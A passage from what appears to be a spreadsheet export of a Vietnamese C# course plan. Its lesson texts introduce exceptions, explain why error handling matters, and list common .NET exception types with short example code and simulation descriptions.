- Giải thích exception (ngoại lệ) là một sự cố lúc chạy, được biểu diễn bằng một đối tượng.
- Phân biệt lỗi biên dịch (compile-time) với lỗi lúc chạy (runtime).
- Nêu những thông tin một đối tượng exception mang theo: loại, thông điệp, dấu vết.
- Nhận ra rằng exception không ai bắt thì chương trình dừng ngay tại dòng gây lỗi.
- Quan sát đường đi của chương trình khi nhập tuổi hợp lệ và không hợp lệ bằng hoạt động mô phỏng.
## Exception là gì
**Exception** (ngoại lệ) là một sự cố xảy ra **trong lúc chương trình đang chạy** và làm gián đoạn luồng thực thi bình thường. Khi sự cố xảy ra, .NET tạo ra một **đối tượng exception** mô tả lỗi rồi "ném" (throw) nó ra. Nếu không có đoạn mã nào "bắt" (catch) đối tượng này, chương trình dừng ngay tại dòng gây lỗi.
Hãy hình dung một dây chuyền sản xuất. Bình thường sản phẩm đi qua từng công đoạn. Khi một máy hỏng, dây chuyền bị gián đoạn: sự kiện "máy hỏng" chính là exception. Nếu không ai xử lý, cả dây chuyền dừng.
Một số nguyên nhân thường gặp:
- Dữ liệu đầu vào sai (nhập chữ vào ô cần số).
- Truy cập thứ không tồn tại (đọc tập tin đã bị xóa).
- Phép tính không hợp lệ (chia số nguyên cho 0).
- Dùng một biến `null` như thể nó là một đối tượng.
## Lỗi biên dịch và lỗi lúc chạy
| | Lỗi biên dịch | Lỗi lúc chạy |
|---|---|---|
| Khi nào xảy ra | Lúc build, trước khi chạy | Khi chương trình đang chạy |
| Nguyên nhân | Sai cú pháp, sai tên, sai kiểu | Phụ thuộc dữ liệu hoặc hoàn cảnh |
| Ai phát hiện | Trình biên dịch | Chỉ biết khi chạy |
| Hậu quả | Không chạy được chương trình | Sinh ra exception |
```csharp
// Lỗi biên dịch: thiếu dấu chấm phẩy, không build được
Console.WriteLine("Xin chào")
```
```csharp
using System;
public class Program
{
    public static void Main()
    {
        int a = 10;
        int b = 0;
        int r = a / b;   // build được, nhưng khi chạy ném DivideByZeroException
        Console.WriteLine(r);
    }
}
```
Exception thuộc nhóm lỗi lúc chạy: trình biên dịch không thể biết trước người dùng sẽ nhập gì hay hệ thống ở trạng thái nào.
## Exception mang theo thông tin gì
Vì exception là một đối tượng, nó chứa nhiều thông tin hữu ích:
- **Loại exception:** cho biết chuyện gì đã xảy ra, ví dụ `FormatException`, `DivideByZeroException`.
- **Thông điệp (`Message`):** câu mô tả nguyên nhân.
- **Dấu vết ngăn xếp (`StackTrace`):** các phương thức đã được gọi cho đến khi lỗi xảy ra, giúp tìm đúng vị trí lỗi.
Nhờ đó, việc tìm lỗi dễ hơn nhiều so với cách chỉ trả về một mã lỗi khó hiểu. Bạn sẽ học cách bắt và đọc các thông tin này ở các bài sau.
## Hoạt động: Nhập tuổi và xem chuyện gì xảy ra
Mô phỏng dưới đây chạy đoạn mã đọc một chuỗi nhập vào rồi đổi thành số bằng `int.Parse`. Bạn có thể chọn một giá trị gợi ý (`20`, `abc`, ô trống, `-5`) hoặc tự gõ vào ô `input`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Nhập tuổi**. Trước hết thử `abc` (giá trị mặc định). Biến `input` nhận chuỗi "abc". Đến dòng `int.Parse(input)`, .NET không đổi được nên ném `FormatException`: thẻ lỗi đỏ hiện ra với thông điệp `The input string 'abc' was not in a correct format.` và bước "int.Parse" trên sơ đồ đường đi chuyển đỏ.
- Bấm tiếp. Vì không có `try-catch` nên chương trình dừng ngay tại dòng lỗi. Bước "In kết quả" trên sơ đồ ghi "không được chạy" và khối `Console.WriteLine` phía sau bị làm mờ.
- Đặt lại rồi thử `20`. `int.Parse` thành công, `age = 20`, chương trình in `Năm sau bạn 21 tuổi` và cả ba bước đều xanh. Nhập thử `-5`: chương trình vẫn chạy bình thường và in `Năm sau bạn -4 tuổi`. Tuổi âm là dữ liệu sai theo nghiệp vụ chứ không phải exception, nên ta phải tự kiểm tra. Ô trống thì giống `abc`: cũng là `FormatException`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/exception-la-gi/" title="Exception là gì?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: exception là một đối tượng được ném ra khi có sự cố lúc chạy, và nếu không ai bắt thì chương trình dừng ngay tại đó. Dữ liệu sai nghiệp vụ như tuổi âm không tự gây exception.
## Tóm tắt
- Exception là sự cố lúc chạy, được biểu diễn bằng một đối tượng và được "ném" ra.
- Lỗi biên dịch bị chặn trước khi chạy, còn exception chỉ xuất hiện khi chương trình đang chạy.
- Đối tượng exception có loại, thông điệp (`Message`) và dấu vết (`StackTrace`).
- Không ai bắt thì chương trình dừng ngay tại dòng gây lỗi, các dòng sau không chạy.
- Dữ liệu sai nghiệp vụ (như tuổi âm) không tự ném exception, ta phải tự kiểm tra.</t>
        </is>
      </c>
    </row>
    <row r="14" ht="409.6" customHeight="1" s="18">
      <c r="A14" s="10" t="n">
        <v>13</v>
      </c>
      <c r="B14" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C14" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Exception và Tầm quan trọng</t>
        </is>
      </c>
      <c r="D14" s="10" t="inlineStr">
        <is>
          <t>Tại sao cần xử lý lỗi?</t>
        </is>
      </c>
      <c r="E14" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F14" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G14" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H14" s="10" t="inlineStr">
        <is>
          <t>So sánh trải nghiệm người dùng khi chương trình không xử lý lỗi và khi có xử lý lỗi.</t>
        </is>
      </c>
      <c r="I14" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Không xử lý | Có xử lý</t>
        </is>
      </c>
      <c r="J14" s="10" t="inlineStr">
        <is>
          <t>Dưới mỗi cột là một 'cửa sổ console' giả lập: trái hiện vết lỗi dài màu đỏ, phải hiện câu thông báo thân thiện. Biểu tượng 'Đơn đã lưu: 1, 2, 3' với ✓/✗.</t>
        </is>
      </c>
      <c r="K14" s="10" t="inlineStr">
        <is>
          <t>H03, H09</t>
        </is>
      </c>
      <c r="L14" s="10" t="inlineStr">
        <is>
          <t>1 tab: Nhập 3 đơn hàng, đơn 2 nhập sai số lượng</t>
        </is>
      </c>
      <c r="M14" s="10" t="inlineStr">
        <is>
          <t>Cả hai xử lý 3 đơn hàng: số lượng "2", "hai", "5".
Đơn 1: cả hai xử lý và lưu bình thường.
Đơn 2: trái ném FormatException, chương trình sập; phải bắt lỗi, báo "Số lượng không hợp lệ, bỏ qua đơn 2".
Đơn 3: trái không bao giờ được xử lý; phải xử lý bình thường.
Kết quả: trái lưu 1/3 đơn và hiện thông báo khó hiểu; phải lưu 2/3 đơn và báo rõ đơn lỗi.</t>
        </is>
      </c>
      <c r="N14" s="10" t="inlineStr">
        <is>
          <t>Số lượng: 2, hai, 5</t>
        </is>
      </c>
      <c r="O14" s="10" t="inlineStr">
        <is>
          <t>Xử lý lỗi giúp chương trình không sập, giữ được phần dữ liệu tốt và báo lỗi dễ hiểu.</t>
        </is>
      </c>
      <c r="P14" s="10" t="inlineStr">
        <is>
          <t>Có thể đính kèm lại ở 'Giới thiệu về khối try-catch' nếu không làm riêng.</t>
        </is>
      </c>
      <c r="Q14" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/tai-sao-can-xu-ly-loi/index.html</t>
        </is>
      </c>
      <c r="R14" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/tai-sao-can-xu-ly-loi/</t>
        </is>
      </c>
      <c r="S14" s="10" t="n"/>
      <c r="T14" s="12" t="n"/>
      <c r="U14" s="12" t="n"/>
      <c r="V14" s="21" t="inlineStr">
        <is>
          <t>Tại sao cần xử lý lỗi?
Trong các bài học trước, chúng ta đã làm quen với khái niệm Exception và hệ thống phân cấp của chúng trong .NET. Tuy nhiên, việc hiểu "nó là gì" chỉ là bước khởi đầu. Để trở thành một lập trình viên chuyên nghiệp, câu hỏi quan trọng nhất bạn cần trả lời là: Tại sao chúng ta phải dành thời gian để viết code xử lý những tình huống không mong muốn này?
Xử lý lỗi không đơn thuần là để chương trình không bị "văng" (crash), mà đó là về tư duy xây dựng hệ thống bền vững, bảo mật và thân thiện với người dùng.
1. Đảm bảo trải nghiệm người dùng liền mạch
Hãy tưởng tượng bạn đang sử dụng một ứng dụng ngân hàng để chuyển khoản. Ngay khi bạn nhấn nút "Gửi", ứng dụng bỗng nhiên đóng sập mà không thông báo lý do. Bạn không biết liệu tiền đã đi chưa, hay lỗi do đường truyền internet.
Nếu lập trình viên có xử lý lỗi, ứng dụng sẽ bắt được tình huống ngắt kết nối và hiển thị thông báo: "Đường truyền không ổn định, vui lòng kiểm tra lại kết nối và thử lại sau.". Sự khác biệt giữa một ứng dụng bị "văng" và một ứng dụng thông báo lỗi tinh tế chính là khoảng cách giữa một sản phẩm nghiệp dư và chuyên nghiệp.
"Người dùng không quan tâm đến mã nguồn của bạn, họ chỉ quan tâm đến việc ứng dụng có hoạt động ổn định hay không khi đối mặt với những tình huống xấu nhất."
2. Bảo vệ tính toàn vẹn của dữ liệu
Một trong những nguy cơ lớn nhất khi không xử lý lỗi là trạng thái dữ liệu không nhất quán. Hãy xem xét ví dụ về một quy trình cập nhật cơ sở dữ liệu:
public void TransferMoney(Account from, Account to, decimal amount)
{
    // Bước 1: Trừ tiền người gửi
    from.Balance -= amount;
    // Bước 2: Cộng tiền người nhận
    // Giả sử tại đây phát sinh lỗi (ví dụ: mất kết nối CSDL)
    to.Balance += amount;
}
Nếu bước 2 bị lỗi và chương trình không được xử lý, số tiền đã bị trừ ở người gửi nhưng chưa bao giờ đến tay người nhận. Đây là một thảm họa trong các hệ thống tài chính. Việc xử lý lỗi cho phép bạn thực hiện các cơ chế như "rollback" (hoàn tác) hoặc thông báo dừng giao dịch ngay lập tức để đảm bảo dữ liệu không bị sai lệch.
3. Hỗ trợ gỡ lỗi (Debugging) và bảo trì hiệu quả
Khi ứng dụng được triển khai trên môi trường thực tế (Production), bạn không thể theo dõi từng dòng code chạy như lúc đang debug ở máy cá nhân. Nếu chương trình gặp lỗi mà không có thông tin ghi chép lại (log), bạn sẽ mất hàng giờ, thậm chí hàng ngày để tìm ra nguyên nhân.
Việc xử lý lỗi giúp bạn:
Ghi lại nhật ký (Logging): Lưu lại thông tin chi tiết về lỗi, thời điểm xảy ra và ngữ cảnh (biến đang giữ giá trị gì).
Truy vết (Tracing): Dễ dàng xác định chính xác dòng code nào hoặc module nào đang gây ra vấn đề.
4. Tăng cường tính bảo mật cho ứng dụng
Lỗi hệ thống thường là "mỏ vàng" cho những kẻ tấn công. Nếu bạn để ứng dụng hiển thị thông báo lỗi chi tiết của hệ thống (ví dụ: thông tin về cấu trúc database, đường dẫn thư mục, hoặc phiên bản thư viện) cho người dùng cuối, bạn đang vô tình cung cấp cho hacker bản đồ để tấn công.
Xử lý lỗi giúp bạn chặn đứng các thông tin nội bộ này, thay thế bằng các thông báo chung chung, an toàn cho người dùng, trong khi vẫn giữ được thông tin chi tiết cần thiết ở các tệp tin log bảo mật trên máy chủ.
Tóm lược: Lợi ích của việc chủ động xử lý lỗi
Thay vì để chương trình gặp lỗi một cách thụ động, việc chủ động xử lý giúp bạn đạt được:
Độ tin cậy: Hệ thống không bị dừng đột ngột mà có khả năng phục hồi hoặc thoát chương trình một cách có kiểm soát.
Tính chuyên nghiệp: Cung cấp thông tin phản hồi có ý nghĩa cho người dùng.
Khả năng kiểm soát: Bạn nắm quyền quyết định chương trình sẽ làm gì khi mọi thứ không diễn ra như dự định.
Trong các bài học kế tiếp, chúng ta sẽ bắt đầu viết những dòng code try/catch đầu tiên để hiện thực hóa tư duy này, biến ứng dụng của bạn trở nên "lì lợm" hơn trước mọi biến cố trong môi trường thực tế.</t>
        </is>
      </c>
      <c r="W14" s="22" t="inlineStr">
        <is>
          <t># Tại sao cần xử lý lỗi?
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nêu các lý do cần xử lý lỗi: trải nghiệm người dùng, dữ liệu toàn vẹn, dễ gỡ lỗi và an toàn.
- So sánh chương trình có và không có xử lý lỗi khi gặp dữ liệu sai.
- Nhận ra một lỗi không được bắt có thể làm mất cả những dữ liệu hợp lệ phía sau.
- Đọc một đoạn `try-catch` đơn giản bao quanh phép đổi kiểu `int.Parse`.
- Quan sát hai chương trình xử lý 3 đơn hàng, một bên sập, một bên đi tiếp, bằng hoạt động mô phỏng.
## Xử lý lỗi không chỉ để khỏi "văng"
Xử lý lỗi là cách xây dựng chương trình **bền vững, an toàn và thân thiện**. Dưới đây là bốn lý do chính.
### Trải nghiệm người dùng
Hãy tưởng tượng bạn bấm "Gửi" trong ứng dụng chuyển khoản và ứng dụng bỗng đóng sập, không một lời giải thích. Bạn không biết tiền đã đi hay chưa. Nếu lập trình viên bắt được lỗi, ứng dụng có thể báo: "Đường truyền không ổn định, vui lòng thử lại." Đó là khác biệt giữa sản phẩm nghiệp dư và chuyên nghiệp.
### Bảo vệ dữ liệu
Lỗi giữa chừng có thể để dữ liệu ở trạng thái dở dang:
```csharp
public void TransferMoney(Account from, Account to, decimal amount)
{
    from.Balance -= amount;   // bước 1: trừ tiền người gửi
    // nếu có lỗi ở đây (ví dụ mất kết nối)...
    to.Balance += amount;     // bước 2: cộng tiền người nhận
}
```
Nếu bước 2 không chạy, tiền đã bị trừ nhưng không ai nhận được. Xử lý lỗi cho phép hoàn tác thao tác hoặc dừng giao dịch một cách có kiểm soát.
### Dễ gỡ lỗi và bảo trì
Khi chương trình đã chạy thật, bạn không thể theo dõi từng dòng như lúc debug. Bắt lỗi giúp ghi **nhật ký (log)** về loại lỗi, thời điểm và ngữ cảnh để tìm nguyên nhân nhanh.
### Bảo mật
Thông điệp lỗi kỹ thuật (đường dẫn thư mục, cấu trúc cơ sở dữ liệu) không nên hiện cho người dùng cuối, vì nó giúp kẻ xấu hiểu hệ thống. Hãy hiển thị thông báo chung chung cho người dùng và giữ chi tiết trong log.
## Ví dụ: ba đơn hàng
Giả sử có ba đơn hàng với số lượng nhập dưới dạng chuỗi: `"2"`, `"hai"`, `"5"`. Đơn thứ hai nhập sai.
**Không xử lý lỗi:** `int.Parse("hai")` ném `FormatException`, chương trình dừng, đơn thứ ba chưa được xử lý dù hợp lệ.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string[] qty = { "2", "hai", "5" };
        int saved = 0;
        for (int i = 0; i &lt; 3; i++)
        {
            int n = int.Parse(qty[i]);
            saved++;
            Console.WriteLine("Đã lưu đơn " + (i + 1));
        }
    }
}
// Đã lưu đơn 1
// Unhandled exception. System.FormatException: The input string 'hai' was not in a correct format.
```
**Có xử lý lỗi:** `catch` bắt lỗi của đơn thứ hai, báo rõ rồi vòng lặp đi tiếp.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string[] qty = { "2", "hai", "5" };
        int saved = 0;
        for (int i = 0; i &lt; 3; i++)
        {
            try
            {
                int n = int.Parse(qty[i]);
                saved++;
                Console.WriteLine("Đã lưu đơn " + (i + 1));
            }
            catch (FormatException)
            {
                Console.WriteLine("Số lượng không hợp lệ, bỏ qua đơn " + (i + 1));
            }
        }
    }
}
// Đã lưu đơn 1
// Số lượng không hợp lệ, bỏ qua đơn 2
// Đã lưu đơn 3
```
## Hoạt động: Sập hay đi tiếp
Mô phỏng dưới đây chia hai cột: cột trái là chương trình **Không xử lý**, cột phải là chương trình **Có xử lý**. Cả hai cùng xử lý ba đơn với số lượng "2", "hai", "5". Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để hai cột cùng chạy:
- Mở tab **3 đơn hàng**. Ở bước đầu, cả hai bên chuẩn bị ba đơn, chưa đơn nào được lưu. Đơn 1 ("2") bình thường: bóng đèn đơn 1 sáng xanh ở cả hai bên và console in `Đã lưu đơn 1`.
- Đến đơn 2 ("hai"). Cột trái: `int.Parse("hai")` ném `FormatException`, thẻ lỗi đỏ hiện ra, console in vết lỗi `Unhandled exception. System.FormatException:` và chương trình sập. Cột phải: `catch` bắt được, console in `Số lượng không hợp lệ, bỏ qua đơn 2`, đèn đơn 2 chuyển đỏ với nhãn "bỏ qua" và chương trình không sập.
- Đến đơn 3 ("5"). Cột trái: chương trình đã dừng nên đơn 3 không bao giờ được xử lý dù hợp lệ. Cột phải: vòng lặp đi tiếp và lưu đơn 3. Bảng điểm cuối cho thấy bên trái lưu `1/3` đơn (màu đỏ), bên phải lưu `2/3` đơn (màu xanh) và biết chính xác đơn nào lỗi.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/tai-sao-can-xu-ly-loi/" title="Tại sao cần xử lý lỗi?" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: xử lý lỗi giúp chương trình không sập, giữ được phần dữ liệu tốt và báo lỗi rõ ràng, thay vì bỏ lại một vết lỗi khó hiểu và mất cả đơn hợp lệ.
## Lợi ích của việc chủ động xử lý lỗi
- **Độ tin cậy:** chương trình không dừng đột ngột, có thể phục hồi hoặc thoát có kiểm soát.
- **Tính chuyên nghiệp:** người dùng nhận được phản hồi có ý nghĩa.
- **Khả năng kiểm soát:** bạn quyết định chương trình làm gì khi sự cố xảy ra.
## Tóm tắt
- Xử lý lỗi giúp trải nghiệm người dùng liền mạch thay vì để chương trình sập.
- Nó bảo vệ dữ liệu khỏi trạng thái dở dang khi lỗi xảy ra giữa chừng.
- Nó hỗ trợ ghi log và truy vết, giúp gỡ lỗi nhanh hơn.
- Nó tránh để lộ thông tin kỹ thuật nội bộ cho người dùng.
- Trong mô phỏng, bên không xử lý lưu được 1/3 đơn, bên có `try-catch` lưu được 2/3 đơn và báo rõ đơn lỗi.</t>
        </is>
      </c>
    </row>
    <row r="15" ht="409.6" customHeight="1" s="18">
      <c r="A15" s="10" t="n">
        <v>14</v>
      </c>
      <c r="B15" s="10" t="inlineStr">
        <is>
          <t>2. Xử lý lỗi và Ngoại lệ (Exception Handling) Cơ bản</t>
        </is>
      </c>
      <c r="C15" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Exception và Tầm quan trọng</t>
        </is>
      </c>
      <c r="D15" s="10" t="inlineStr">
        <is>
          <t>Các loại Exception phổ biến trong C#</t>
        </is>
      </c>
      <c r="E15" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F15" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G15" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H15" s="10" t="inlineStr">
        <is>
          <t>Nhận diện các exception hay gặp qua chính dòng code gây ra chúng.</t>
        </is>
      </c>
      <c r="I15" s="10" t="inlineStr">
        <is>
          <t>1 cột, 6 tab (bộ sưu tập thẻ lỗi)</t>
        </is>
      </c>
      <c r="J15" s="10" t="inlineStr">
        <is>
          <t>Mỗi tab là một 'thẻ bài' exception: biểu tượng, tên loại, dòng code gây lỗi, thông điệp thật của .NET, một dòng 'Cách phòng tránh'. Khung bộ nhớ hiện giá trị biến dẫn tới lỗi.</t>
        </is>
      </c>
      <c r="K15" s="10" t="inlineStr">
        <is>
          <t>H03</t>
        </is>
      </c>
      <c r="L15" s="10" t="inlineStr">
        <is>
          <t>FormatException | DivideByZeroException | IndexOutOfRangeException | NullReferenceException | InvalidCastException | OverflowException</t>
        </is>
      </c>
      <c r="M15" s="10" t="inlineStr">
        <is>
          <t>Mỗi tab 3 bước: (1) chuẩn bị dữ liệu, (2) chạy dòng gây lỗi, (3) thẻ lỗi + cách phòng tránh.
Format: int.Parse("12a") → "The input string '12a' was not in a correct format." → dùng int.TryParse.
DivideByZero: int a = 10, b = 0; a / b → "Attempted to divide by zero." → kiểm tra b != 0. Ghi chú: double chia 0 không lỗi mà ra ∞.
IndexOutOfRange: int[] arr = new int[3]; arr[3] → "Index was outside the bounds of the array." → kiểm tra i &lt; arr.Length.
NullReference: string s = null; s.Length → "Object reference not set to an instance of an object." → kiểm tra null hoặc dùng s?.Length.
InvalidCast: object o = "abc"; (int)o → "Unable to cast object of type 'System.String' to type 'System.Int32'." → dùng is/as.
Overflow: checked { int x = int.MaxValue; x = x + 1; } → "Arithmetic operation resulted in an overflow." Ghi chú: không có checked thì không lỗi mà quay vòng thành số âm.</t>
        </is>
      </c>
      <c r="N15" s="10" t="inlineStr">
        <is>
          <t>Dữ liệu cố định từng tab</t>
        </is>
      </c>
      <c r="O15" s="10" t="inlineStr">
        <is>
          <t>Tên loại exception cho biết nguyên nhân; đọc tên loại là bước đầu tiên để sửa lỗi.</t>
        </is>
      </c>
      <c r="P15" s="10" t="inlineStr">
        <is>
          <t>Thông điệp theo .NET hiện đại. OverflowException chỉ xảy ra trong ngữ cảnh checked (hoặc khi Parse/Convert số quá lớn).</t>
        </is>
      </c>
      <c r="Q15" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/cac-loai-exception-pho-bien-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R15" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/gioi-thieu-ve-exception-va-tam-quan-trong/cac-loai-exception-pho-bien-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S15" s="10" t="n"/>
      <c r="T15" s="12" t="n"/>
      <c r="U15" s="12" t="n"/>
      <c r="V15" s="21" t="inlineStr">
        <is>
          <t>Hệ thống phân cấp Exception trong C#
Trong bài học trước, chúng ta đã tìm hiểu khái niệm cơ bản về Exception là gì. Để hiểu sâu hơn về cách các lỗi này được tổ chức và xử lý trong C#, chúng ta cần nắm rõ hệ thống phân cấp Exception.
Trong C#, tất cả các loại ngoại lệ đều kế thừa từ một lớp cơ sở duy nhất là System.Exception. Điều này có nghĩa là bất kỳ đối tượng Exception nào bạn gặp phải hoặc tạo ra đều là một phiên bản của System.Exception hoặc một lớp con của nó. Hệ thống phân cấp này rất quan trọng vì nó cho phép chúng ta bắt và xử lý các loại ngoại lệ cụ thể hoặc tổng quát hơn khi cần thiết.
System.Exception là "cha đẻ" của mọi Exception. Từ lớp này, có hai nhánh chính:
System.SystemException: Đây là lớp cơ sở cho hầu hết các lỗi xảy ra trong quá trình thực thi ứng dụng do Common Language Runtime (CLR) phát hiện. Các lỗi này thường liên quan đến các vấn đề nội bộ của .NET Framework hoặc các lỗi lập trình phổ biến.
System.ApplicationException: Lớp này được khuyến nghị sử dụng làm lớp cơ sở cho các Exception do lập trình viên định nghĩa (custom exceptions) để phân biệt rõ ràng với các lỗi của hệ thống.
Trong phạm vi bài học này, chúng ta sẽ tập trung vào một số loại System.SystemException phổ biến nhất mà bạn sẽ thường xuyên gặp phải trong quá trình phát triển ứng dụng C#.
Các Exception phổ biến và cách nhận diện
Việc nhận diện các loại Exception phổ biến là kỹ năng then chốt để có thể xử lý chúng một cách hiệu quả. Dưới đây là một số Exception bạn sẽ thường xuyên gặp phải, cùng với nguyên nhân và biểu hiện của chúng.
DivideByZeroException
DivideByZeroException xảy ra khi bạn cố gắng thực hiện phép chia một số nguyên (integer) hoặc số thập phân (decimal) cho số không (0). Đây là một lỗi toán học cơ bản mà máy tính không thể thực hiện được.
Nguyên nhân: Thực hiện phép toán chia cho 0.
Biểu hiện: Chương trình sẽ dừng đột ngột (crash) tại dòng code thực hiện phép chia nếu không được xử lý.
Ví dụ:
int tuSo = 10;
int mauSo = 0;
int ketQua = tuSo / mauSo; // Dòng này sẽ gây ra DivideByZeroException
Console.WriteLine(ketQua);
Lưu ý: Với kiểu dữ liệu dấu phẩy động (như float hoặc double), chia cho 0 sẽ không gây ra Exception mà sẽ trả về các giá trị đặc biệt như Infinity (vô cùng) hoặc NaN (Not a Number), tùy thuộc vào ngữ cảnh. DivideByZeroException chỉ xảy ra với kiểu số nguyên và decimal.
FormatException
FormatException xảy ra khi một giá trị không nằm trong định dạng mong đợi được truyền cho một phương thức chuyển đổi kiểu dữ liệu. Điều này thường gặp khi cố gắng chuyển đổi một chuỗi (string) thành một kiểu dữ liệu số hoặc ngày tháng.
Nguyên nhân: Dữ liệu đầu vào không đúng định dạng mà phương thức chuyển đổi mong đợi.
Biểu hiện: Chương trình dừng đột ngột.
Ví dụ:
string chuoiSo = "abc";
int soNguyen = int.Parse(chuoiSo); // Dòng này sẽ gây ra FormatException
Console.WriteLine(soNguyen);
Trong ví dụ trên, phương thức int.Parse() mong đợi một chuỗi có thể biểu diễn thành số nguyên. Chuỗi "abc" rõ ràng không phải là một số hợp lệ, dẫn đến FormatException.
NullReferenceException
NullReferenceException có lẽ là một trong những Exception phổ biến và "khó chịu" nhất đối với lập trình viên C#. Nó xảy ra khi bạn cố gắng truy cập một thành viên (phương thức hoặc thuộc tính) của một đối tượng mà tham chiếu của nó đang có giá trị null (không trỏ đến bất kỳ đối tượng nào trong bộ nhớ).
Nguyên nhân: Cố gắng sử dụng một biến tham chiếu có giá trị null như thể nó đang trỏ đến một đối tượng hợp lệ.
Biểu hiện: Chương trình dừng đột ngột, thường đi kèm với thông báo "Object reference not set to an instance of an object."
Ví dụ:
string ten = null;
int doDai = ten.Length; // Dòng này sẽ gây ra NullReferenceException
Console.WriteLine(doDai);
Trong ví dụ này, biến ten đang giữ giá trị null. Khi bạn cố gắng truy cập thuộc tính Length của nó, hệ thống không tìm thấy đối tượng nào để truy cập, dẫn đến lỗi. Để tránh lỗi này, bạn cần đảm bảo rằng biến tham chiếu đã được khởi tạo trước khi sử dụng.
IndexOutOfRangeException
IndexOutOfRangeException xảy ra khi bạn cố gắng truy cập một phần tử của một mảng (array) hoặc một bộ sưu tập (collection) bằng một chỉ số (index) nằm ngoài phạm vi hợp lệ của mảng/bộ sưu tập đó.
Nguyên nhân: Chỉ số truy cập nhỏ hơn 0 hoặc lớn hơn hoặc bằng số lượng phần tử của mảng/bộ sưu tập.
Biểu hiện: Chương trình dừng đột ngột.
Ví dụ:
int[] soNguyenArr = new int[5]; // Mảng có 5 phần tử, chỉ số hợp lệ từ 0 đến 4
soNguyenArr[0] = 10;
soNguyenArr[4] = 20;
int giaTri = soNguyenArr[5]; // Dòng này sẽ gây ra IndexOutOfRangeException
Console.WriteLine(giaTri);
Ở đây, mảng soNguyenArr có kích thước 5, nghĩa là các chỉ số hợp lệ là 0, 1, 2, 3, 4. Việc cố gắng truy cập soNguyenArr[5] là không hợp lệ vì chỉ số 5 nằm ngoài phạm vi này.
Việc hiểu rõ các loại Exception phổ biến này là bước đầu tiên và quan trọng nhất trong việc học cách xử lý lỗi hiệu quả. Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào cách sử dụng các cấu trúc try-catch để bắt và xử lý những ngoại lệ này một cách an toàn, giúp chương trình của bạn trở nên mạnh mẽ và đáng tin cậy hơn.</t>
        </is>
      </c>
      <c r="W15" s="22" t="inlineStr">
        <is>
          <t># Các loại Exception phổ biến trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nêu được rằng mọi exception trong .NET đều kế thừa từ lớp `System.Exception`.
- Nhận ra sáu exception hay gặp qua dòng code gây ra chúng.
- Giải thích nguyên nhân của `FormatException`, `DivideByZeroException`, `IndexOutOfRangeException`, `NullReferenceException`, `InvalidCastException` và `OverflowException`.
- Nêu cách phòng tránh phù hợp cho từng loại.
- Quan sát từng exception xuất hiện ở đúng dòng gây lỗi bằng hoạt động mô phỏng.
## Hệ thống phân cấp exception
Trong C#, mọi exception đều là đối tượng của lớp `System.Exception` hoặc một lớp con của nó. Nhờ vậy, sau này bạn có thể bắt một loại cụ thể hoặc bắt chung bằng `Exception`.
Các exception do môi trường chạy (runtime) hoặc thư viện .NET ném ra như những loại trong bài này thường là lớp con của `System.SystemException`. Với exception tự định nghĩa, .NET hiện đại khuyên kế thừa trực tiếp từ `Exception` (không dùng `ApplicationException`).
**Tên loại exception là manh mối đầu tiên** để sửa lỗi: đọc tên là biết ngay vấn đề thuộc nhóm nào.
## Sáu exception hay gặp
### FormatException
Xảy ra khi chuỗi **không đúng định dạng** mà phương thức chuyển đổi mong đợi.
```csharp
string s = "12a";
int n = int.Parse(s);   // FormatException: The input string '12a' was not in a correct format.
```
Phòng tránh: dùng `int.TryParse` để kiểm tra trước, nó không ném lỗi mà trả về `false`.
### DivideByZeroException
Xảy ra khi **chia số nguyên cho 0**.
```csharp
int a = 10;
int b = 0;
int r = a / b;   // DivideByZeroException: Attempted to divide by zero.
```
Lưu ý: với `double`, phép `10.0 / 0` không ném lỗi mà cho kết quả vô cực (`Infinity`). Phòng tránh: kiểm tra `b != 0` trước khi chia.
### IndexOutOfRangeException
Xảy ra khi truy cập mảng bằng **chỉ số ngoài phạm vi**. Chỉ số bắt đầu từ 0 nên mảng 3 phần tử chỉ có chỉ số 0, 1, 2.
```csharp
int[] arr = new int[3];
int x = arr[3];   // IndexOutOfRangeException: Index was outside the bounds of the array.
